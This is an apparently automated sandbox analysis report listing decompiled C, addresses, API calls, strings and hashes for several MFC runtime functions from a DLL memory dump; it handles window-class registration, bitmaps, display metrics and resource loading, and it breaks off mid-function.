Download Yara Rule

C-Code - Quality: 94%

			E1000BEC8(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t127;
				void* _t133;
				intOrPtr _t135;
				signed int _t145;
				signed int _t150;
				signed int _t183;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t191;
				signed int _t195;
				void* _t198;
				intOrPtr _t199;
				signed int _t209;

				_t198 = __ecx;
				_t127 = E10006DEC(__ebx, __edi, __esi, __eflags);
				_v8 = _t127;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t127 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 0;
				E10013A90(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t133 = E10006DEC(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t133 + 8));
				_t135 =  *0x10058728; // 0x10003
				_t195 = 8;
				_v32 = _t135;
				_v16 = _t195;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd90s";
					_t191 = E1000BCCC(_t195, _t198, 0, 0, __eflags);
					__eflags = _t191;
					if(_t191 != 0) {
						_t209 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl90s";
					_t189 = E1000BCCC(_t195, _t198, 0, _t209, __eflags);
					__eflags = _t189;
					if(_t189 != 0) {
						_t209 = _t209 | 0x00000020;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar90s";
					_v28 = 0x10;
					_t187 = E1000BCCC(_t195, _t198, 0, _t209, __eflags);
					__eflags = _t187;
					if(_t187 != 0) {
						_t209 = _t209 | 0x00000002;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t195;
					_v28 = 0;
					_t185 = E1000BE84(_t198, __eflags,  &_v56, "AfxMDIFrame90s", 0x7a01);
					__eflags = _t185;
					if(_t185 != 0) {
						_t209 = _t209 | 0x00000004;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & _t195;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t183 = E1000BE84(_t198, __eflags,  &_v56, "AfxFrameOrView90s", 0x7a02);
					__eflags = _t183;
					if(_t183 != 0) {
						_t209 = _t209 | _t195;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t209 = _t209 | E10009A9E(_t195, _t198, _t209, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t209 = _t209 | E10009A9E(_t195, _t198, _t209, __eflags,  &_v16, 0x40);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t209 = _t209 | E10009A9E(_t195, _t198, _t209, __eflags,  &_v16, 0x80);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t195;
					_t209 = _t209 | E10009A9E(_t195, _t198, _t209, __eflags,  &_v16, 0x100);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t209 = _t209 | E10009A9E(_t195, _t198, _t209, __eflags,  &_v16, 0x200);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t209 = _t209 | E10009A9E(0x400, _t198, _t209, __eflags,  &_v16, 0x400);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t209 = _t209 | E10009A9E(0x400, _t198, _t209, __eflags,  &_v16, 0x800);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t209 = _t209 | E10009A9E(0x400, _t198, _t209, __eflags,  &_v16, 0x1000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t209 = _t209 | E10009A9E(0x400, _t198, _t209, __eflags,  &_v16, 0x2000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t209 = _t209 | E10009A9E(0x400, _t198, _t209, __eflags,  &_v16, 0x4000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t209 = _t209 | E10009A9E(0x400, _t198, _t209, __eflags,  &_v16, 0x8000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t209 = _t209 | E10009A9E(0x400, _t198, _t209, __eflags,  &_v16, 0x10000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t209 = _t209 | E10009A9E(0x400, _t198, _t209, __eflags,  &_v16, 0x20000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t209 = _t209 | E10009A9E(0x400, _t198, _t209, __eflags,  &_v16, 0x40000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00080000;
				if(__eflags != 0) {
					_v12 = 0x1000;
					_t209 = _t209 | E10009A9E(0x400, _t198, _t209, __eflags,  &_v16, 0x80000);
					__eflags = _t209;
				}
				_t199 = _v8;
				 *(_t199 + 0x18) =  *(_t199 + 0x18) | _t209;
				_t145 =  *(_t199 + 0x18);
				__eflags = (_t145 & 0x00003fc0) - 0x3fc0;
				if((_t145 & 0x00003fc0) == 0x3fc0) {
					 *(_t199 + 0x18) = _t145 | 0x00000010;
					_t209 = _t209 | 0x00000010;
					__eflags = _t209;
				}
				asm("sbb eax, eax");
				_t150 =  ~((_t209 & _a4) - _a4) + 1;
				__eflags = _t150;
				return _t150;
			}

0x1000bec8
0x1000bed0
0x1000bed5
0x1000bedd
0x1000bedd
0x1000bee0
0x00000000
0x1000bee4
0x1000beea
0x1000beeb
0x1000beec
0x1000bef6
0x1000bef8
0x1000bf05
0x1000bf08
0x1000bf0d
0x1000bf16
0x1000bf19
0x1000bf1e
0x1000bf1f
0x1000bf22
0x1000bf25
0x1000bf2a
0x1000bf2b
0x1000bf32
0x1000bf39
0x1000bf3e
0x1000bf40
0x1000bf42
0x1000bf42
0x1000bf42
0x1000bf40
0x1000bf43
0x1000bf47
0x1000bf49
0x1000bf53
0x1000bf54
0x1000bf5b
0x1000bf60
0x1000bf62
0x1000bf64
0x1000bf64
0x1000bf64
0x1000bf62
0x1000bf67
0x1000bf6b
0x1000bf70
0x1000bf71
0x1000bf74
0x1000bf7b
0x1000bf82
0x1000bf87
0x1000bf89
0x1000bf8b
0x1000bf8b
0x1000bf8b
0x1000bf89
0x1000bf8e
0x1000bf92
0x1000bfa2
0x1000bfa5
0x1000bfa8
0x1000bfad
0x1000bfaf
0x1000bfb1
0x1000bfb1
0x1000bfb1
0x1000bfaf
0x1000bfb4
0x1000bfb7
0x1000bfc7
0x1000bfce
0x1000bfd5
0x1000bfda
0x1000bfdc
0x1000bfde
0x1000bfde
0x1000bfde
0x1000bfdc
0x1000bfe0
0x1000bfe4
0x1000bfef
0x1000bffb
0x1000bffd
0x1000bffd
0x1000bffd
0x1000bffd
0x1000c004
0x1000c008
0x1000c010
0x1000c01c
0x1000c01c
0x1000c01c
0x1000c01e
0x1000c022
0x1000c02d
0x1000c039
0x1000c039
0x1000c039
0x1000c040
0x1000c043
0x1000c04a
0x1000c052
0x1000c052
0x1000c052
0x1000c059
0x1000c05c
0x1000c063
0x1000c06f
0x1000c06f
0x1000c06f
0x1000c076
0x1000c079
0x1000c080
0x1000c08c
0x1000c08c
0x1000c08c
0x1000c093
0x1000c096
0x1000c09d
0x1000c0a9
0x1000c0a9
0x1000c0a9
0x1000c0b0
0x1000c0b3
0x1000c0ba
0x1000c0c6
0x1000c0c6
0x1000c0c6
0x1000c0cd
0x1000c0d0
0x1000c0d7
0x1000c0e3
0x1000c0e3
0x1000c0e3
0x1000c0ea
0x1000c0ed
0x1000c0f4
0x1000c0fc
0x1000c0fc
0x1000c0fc
0x1000c103
0x1000c106
0x1000c10d
0x1000c115
0x1000c115
0x1000c115
0x1000c11c
0x1000c11f
0x1000c126
0x1000c132
0x1000c132
0x1000c132
0x1000c139
0x1000c13c
0x1000c143
0x1000c14f
0x1000c14f
0x1000c14f
0x1000c156
0x1000c159
0x1000c160
0x1000c168
0x1000c168
0x1000c168
0x1000c16f
0x1000c172
0x1000c179
0x1000c185
0x1000c185
0x1000c185
0x1000c187
0x1000c18a
0x1000c18d
0x1000c199
0x1000c19b
0x1000c1a0
0x1000c1a3
0x1000c1a3
0x1000c1a3
0x1000c1b2
0x1000c1b4
0x1000c1b4
0x00000000

APIs

_memset.LIBCMT ref: 1000BEF8

Strings

@, xrefs: 1000C004
AfxFrameOrView90s, xrefs: 1000BFBE
AfxMDIFrame90s, xrefs: 1000BF99
@, xrefs: 1000C09D

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90s$AfxMDIFrame90s
API String ID: 2102423945-455206835
Opcode ID: 9cb5eb4a567ca3091ac157e98fbdc4f8bbb649df3a06e085a865271c269aa9b2
Instruction ID: e55de1e570b7b1329f040d281748ed73d099ff5641ead835abdef367651ca1b2
Opcode Fuzzy Hash: 9cb5eb4a567ca3091ac157e98fbdc4f8bbb649df3a06e085a865271c269aa9b2
Instruction Fuzzy Hash: 24910075D0024DAAEB40CFA4C985BEEBBF8EF053C4F218165F909E7186E7749A44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000477E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000477E(void* __edx) {
				signed int _v8;
				void _v136;
				int _v140;
				int _v144;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				unsigned int _t23;
				char* _t35;
				struct HBITMAP__* _t37;
				unsigned int _t40;
				signed short _t42;
				void* _t46;
				int _t47;
				unsigned int _t49;
				void* _t52;
				signed char* _t53;
				void* _t54;
				signed int _t58;
				void* _t59;
				void* _t60;
				signed int _t62;
				void* _t63;
				void* _t64;
				signed int _t66;
				signed int _t68;

				_t52 = __edx;
				_t66 = _t68;
				_t21 =  *0x10031c30; // 0x1f496801
				_v8 = _t21 ^ _t66;
				_push(_t60);
				_push(_t54);
				_t23 = GetMenuCheckMarkDimensions();
				_t47 = _t23;
				_t40 = _t23 >> 0x10;
				_v144 = _t47;
				_v140 = _t40;
				if(_t47 <= 4) {
					L3:
					E1000572D(_t40, _t47, _t54, _t60, _t73);
				} else {
					_t73 = _t40 - 5;
					if(_t40 <= 5) {
						goto L3;
					}
				}
				if(_t47 > 0x20) {
					_t47 = 0x20;
					_v144 = _t47;
				}
				asm("cdq");
				_t62 = _t47 + 0xf >> 4;
				_t58 = (_t47 - 4 - _t52 >> 1) + (_t62 << 4) - _t47;
				if(_t58 > 0xc) {
					_t58 = 0xc;
				}
				if(_t40 > 0x20) {
					_t40 = 0x20;
					_v140 = _t40;
				}
				E10013A90(_t58,  &_v136, 0xff, 0x80);
				_t35 = _t66 + (_t40 - 6 >> 1) * _t62 * 2 - 0x84;
				_t53 = 0x100277ec;
				_t63 = _t62 + _t62;
				_v148 = 5;
				do {
					_t42 = ( *_t53 & 0x000000ff) << _t58;
					_t53 =  &(_t53[1]);
					_t49 =  !_t42 & 0x0000ffff;
					 *_t35 = _t49 >> 8;
					 *(_t35 + 1) = _t49;
					_t35 = _t35 + _t63;
					_t15 =  &_v148;
					 *_t15 = _v148 - 1;
				} while ( *_t15 != 0);
				_t37 = CreateBitmap(_v144, _v140, 1, 1,  &_v136);
				_pop(_t59);
				_pop(_t64);
				 *0x10058738 = _t37;
				_pop(_t46);
				if(_t37 == 0) {
					 *0x10058738 = _t37;
				}
				return E100127FF(_t37, _t46, _v8 ^ _t66, _t53, _t59, _t64);
			}

0x1000477e
0x10004781
0x10004789
0x10004790
0x10004794
0x10004795
0x10004796
0x1000479c
0x100047a5
0x100047a8
0x100047ae
0x100047b4
0x100047bb
0x100047bb
0x100047b6
0x100047b6
0x100047b9
0x00000000
0x00000000
0x100047b9
0x100047c3
0x100047c7
0x100047c8
0x100047c8
0x100047d1
0x100047d7
0x100047e5
0x100047ea
0x100047ee
0x100047ee
0x100047f2
0x100047f6
0x100047f7
0x100047f7
0x1000480e
0x1000481e
0x10004825
0x1000482a
0x1000482c
0x10004836
0x1000483c
0x1000483f
0x10004843
0x1000484b
0x1000484d
0x10004850
0x10004852
0x10004852
0x10004852
0x10004871
0x10004877
0x10004878
0x10004879
0x1000487e
0x10004881
0x1000488f
0x1000488f
0x1000489f

APIs

GetMenuCheckMarkDimensions.USER32 ref: 10004796
_memset.LIBCMT ref: 1000480E
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10004871
LoadBitmapA.USER32 ref: 10004889

Strings

, xrefs: 100047EF

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 7e57596eb718f89980f2225b75adc34b3a35b4131dd0df06940ad5695c7ff0b9
Instruction ID: 38d01c7a8af288fdc5d41883c0334dfbd7d485240660675bf67417a7b09c4d8f
Opcode Fuzzy Hash: 7e57596eb718f89980f2225b75adc34b3a35b4131dd0df06940ad5695c7ff0b9
Instruction Fuzzy Hash: 5C312971A042299BFB20CF288CC5B9D77F5FB44784F5540AAE54DEB181DF309E859B50

Uniqueness

Uniqueness Score: -1.00%

Function 10007198, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10007198(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E10006FE3() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E10016207(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x10058210(_a4, _a8);
			}

0x100071a7
0x100071c0
0x1000722b
0x1000722b
0x1000722d
0x00000000
0x1000722e
0x100071c2
0x100071c9
0x00000000
0x100071e2
0x100071e3
0x100071e6
0x100071f4
0x100071f7
0x100071ff
0x10007200
0x10007201
0x10007202
0x10007209
0x1000720c
0x10007210
0x1000721f
0x10007224
0x10007227
0x00000000
0x10007227
0x100071c9
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 100071D8
GetSystemMetrics.USER32 ref: 100071F0
GetSystemMetrics.USER32 ref: 100071F7

Strings

DISPLAY, xrefs: 10007214
B, xrefs: 100071B7

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 9311dae1832f8e8337a116874e93f413184b1f366ee112b09151c557d286e897
Instruction ID: 9bcd440f03550b4c59d774eae730e8391ab85612b7fcbc91f542260d3a76c147
Opcode Fuzzy Hash: 9311dae1832f8e8337a116874e93f413184b1f366ee112b09151c557d286e897
Instruction Fuzzy Hash: 781194B1A00224BBEB11DF549C84A5B7BA8FF09790F114461FD09AE14AD775D902CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D15A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000D15A(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E10007989(__ecx, __eflags, _t26) == 0) {
					_t10 = E10009E47(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E10007E46(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E1000FC2E(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

0x1000d15a
0x1000d15a
0x1000d161
0x1000d165
0x1000d16e
0x1000d177
0x1000d17c
0x1000d17e
0x1000d18a
0x1000d18a
0x1000d191
0x1000d1ec
0x00000000
0x1000d1ef
0x1000d193
0x1000d196
0x1000d199
0x1000d1a0
0x1000d1aa
0x1000d1ac
0x00000000
0x00000000
0x1000d1b5
0x1000d1ba
0x1000d1bc
0x00000000
0x00000000
0x1000d1c3
0x1000d1c9
0x1000d1cb
0x1000d1d8
0x1000d1e4
0x00000000
0x1000d1e4
0x1000d1ce
0x1000d1d4
0x1000d1d6
0x00000000
0x00000000
0x00000000
0x1000d1d6
0x1000d19b
0x1000d19e
0x00000000
0x00000000
0x00000000
0x1000d19e
0x1000d180
0x1000d184
0x00000000
0x00000000
0x00000000
0x1000d186
0x1000d170
0x00000000

Strings

Edit, xrefs: 1000D1AE

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 53f50c544bcaa689c310ff49f27e3ecf489f1360eb5b682098813e217d6057b9
Instruction ID: 7c9f7af3dd39f5dfdf63a701d8071394f0cd0181ae5c9bc32f5864b2d50b2036
Opcode Fuzzy Hash: 53f50c544bcaa689c310ff49f27e3ecf489f1360eb5b682098813e217d6057b9
Instruction Fuzzy Hash: 2D115E35200202BBFB51F6258C45BDEBBADEF467D0F210426F905E10AADF61ED51D6B0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D48F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000D48F(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t24;
				void* _t29;
				void* _t31;
				struct HINSTANCE__* _t33;
				signed int _t35;
				signed int _t36;
				void* _t38;
				signed int* _t41;

				_push(__ecx);
				_push(_t29);
				_t38 = __ecx;
				_t43 =  *((intOrPtr*)(__ecx + 0x58));
				_t41 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t33 =  *(E10006DEC(_t29, __ecx, _t41, _t43) + 0xc);
					_v8 = LoadResource(_t33, FindResourceA(_t33,  *(_t38 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t41 = LockResource(_v8);
				}
				_t31 = 1;
				if(_t41 != 0) {
					_t36 =  *_t41;
					if(_t41[0] != 0xffff) {
						_t24 = _t41[2] & 0x0000ffff;
						_t35 = _t41[3] & 0x0000ffff;
					} else {
						_t36 = _t41[3];
						_t24 = _t41[4] & 0x0000ffff;
						_t35 = _t41[5] & 0x0000ffff;
					}
					if((_t36 & 0x00001801) != 0 || _t24 != 0 || _t35 != 0) {
						_t31 = 0;
					}
				}
				if( *(_t38 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t31;
			}

0x1000d494
0x1000d495
0x1000d498
0x1000d49a
0x1000d4a1
0x1000d4a4
0x1000d4a7
0x1000d4ae
0x1000d4c5
0x1000d4c5
0x1000d4cc
0x1000d4d7
0x1000d4d7
0x1000d4db
0x1000d4de
0x1000d4e0
0x1000d4eb
0x1000d4fa
0x1000d4fe
0x1000d4ed
0x1000d4ed
0x1000d4f0
0x1000d4f4
0x1000d4f4
0x1000d508
0x1000d514
0x1000d514
0x1000d508
0x1000d51a
0x1000d51f
0x1000d51f
0x1000d52b

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 1000D4B7
LoadResource.KERNEL32(?,00000000), ref: 1000D4BF
LockResource.KERNEL32(00000000), ref: 1000D4D1
FreeResource.KERNEL32(00000000), ref: 1000D51F

Strings

0Xxt0Ixt@6|t, xrefs: 1000D4BF

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID: 0Xxt0Ixt@6|t
API String ID: 1078018258-893219595
Opcode ID: 49454f1ff69a77db95f4318b0fe44f91df2ca5ba471857ea13f68374bc1a7209
Instruction ID: c0896b2e304d5f4640ea23c8c4ca92a8722b2b4840feb2d3eecf0cf5cdb171d9
Opcode Fuzzy Hash: 49454f1ff69a77db95f4318b0fe44f91df2ca5ba471857ea13f68374bc1a7209
Instruction Fuzzy Hash: 60119D39500B51EBE710EF95CC88AAAB7B4FF047AAF21802AE84253554E774ED44D7B0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C1DF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E1000C1DF(intOrPtr __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				struct HRSRC__* _t10;
				void* _t13;
				void* _t18;
				void* _t20;
				void* _t21;
				struct HINSTANCE__* _t23;

				_push(__ecx);
				_push(_t20);
				_t13 = 0;
				_t18 = 0;
				_v8 = __ecx;
				_t24 = _a4;
				if(_a4 == 0) {
					L4:
					_t21 = E1000BD59(_t13, _v8, _t18, _t18);
					if(_t18 != 0 && _t13 != 0) {
						FreeResource(_t13);
					}
					_t7 = _t21;
				} else {
					_t23 =  *(E10006DEC(0, 0, _t20, _t24) + 0xc);
					_t10 = FindResourceA(_t23, _a4, 0xf0);
					if(_t10 == 0) {
						goto L4;
					} else {
						_t7 = LoadResource(_t23, _t10);
						_t13 = _t7;
						if(_t13 != 0) {
							_t18 = LockResource(_t13);
							goto L4;
						}
					}
				}
				return _t7;
			}

0x1000c1e4
0x1000c1e6
0x1000c1e8
0x1000c1ea
0x1000c1ec
0x1000c1ef
0x1000c1f2
0x1000c226
0x1000c22f
0x1000c233
0x1000c23a
0x1000c23a
0x1000c240
0x1000c1f4
0x1000c1f9
0x1000c205
0x1000c20d
0x00000000
0x1000c20f
0x1000c211
0x1000c217
0x1000c21b
0x1000c224
0x00000000
0x1000c224
0x1000c21b
0x1000c20d
0x1000c246

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1000C205
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,1000D448,?,?,100032A8,1F496801), ref: 1000C211
LockResource.KERNEL32(00000000,?,?,?,?,?,1000D448,?,?,100032A8,1F496801), ref: 1000C21E
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,1000D448,?,?,100032A8,1F496801), ref: 1000C23A

Strings

0Xxt0Ixt@6|t, xrefs: 1000C211

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID: 0Xxt0Ixt@6|t
API String ID: 1078018258-893219595
Opcode ID: ca2f45876683e6749ae8c035a65aac320e01ae0bd88791a191af68ee9ce00b02
Instruction ID: a05652bed2ea77828256231ba266a8883b3883a76a9742079d267798c009a17a
Opcode Fuzzy Hash: ca2f45876683e6749ae8c035a65aac320e01ae0bd88791a191af68ee9ce00b02
Instruction Fuzzy Hash: A3F0C237600315BBF7119FEA8CC4D6BBAACEF842E07124039FA0993204DF70EC018664

Uniqueness

Uniqueness Score: -1.00%

Function 1001C1F5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E1001C1F5(void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;
				void* _t25;

				_t26 = __esi;
				_t24 = __edx;
